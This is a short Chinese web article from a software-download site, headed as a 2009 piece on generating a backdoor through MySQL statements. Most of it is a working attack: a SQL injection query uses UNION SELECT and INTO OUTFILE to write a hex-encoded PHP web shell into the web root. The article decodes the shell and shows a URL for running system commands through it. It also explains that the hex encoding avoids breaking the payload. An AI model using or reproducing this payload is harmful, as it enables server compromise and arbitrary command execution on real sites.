pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范运用Mysql语句生成后门具体方法
阅读排行

运用Mysql语句生成后门具体方法


2009/5/5  编辑:佚名 来源:本站整理

通过MySQL(和PHP搭配之最佳组合) 的语句生成后门木马的方法:

SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455

3545B636D645D293B3F3E

from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

  通过MySQL(和PHP搭配之最佳组合) 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?>

  再通过 http://www.xxx.com/cmd.php?cmd=dir c: 就可以执行系统dos命令!

  问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

  答:就是下图代码中的十六进制编码,

<?php system($_REQUEST[cmd]);?>

  如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

相关文章

cfbarrett翔龙免费领取,cf8月精英军火库怎么成为幸运用户:cf8月精英军火库活动很吸引人,攒兑换券可以兑换奖励,不过这是一个需要运气的活动,那到底怎么才能够成为幸运玩家呢?下面我们一起来看看吧!cfbarrett-翔龙怎么领取攒了10天,终于够了CF精英军火库怎么成为幸运用户?CF精英军火库成为幸...。

运用win2008任务计划功能:1、对重要数据进行定时备份  伴随着信息化进程的逐步推进,以及信息技术的不断普及,各个单位对局域网网络的依赖程度也是越来越高,保存在局域网服务器中的数据信息也是越来越重要。

运用Mysql语句生成后门具体方法:通过MySQL(和PHP搭配之最佳组合)的语句生成后门木马的方法:SELECT*FROM`vbb_strikes`WHERE1unionselect2,3,0x3C3F7068702073797374656D28245F5245515545...。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图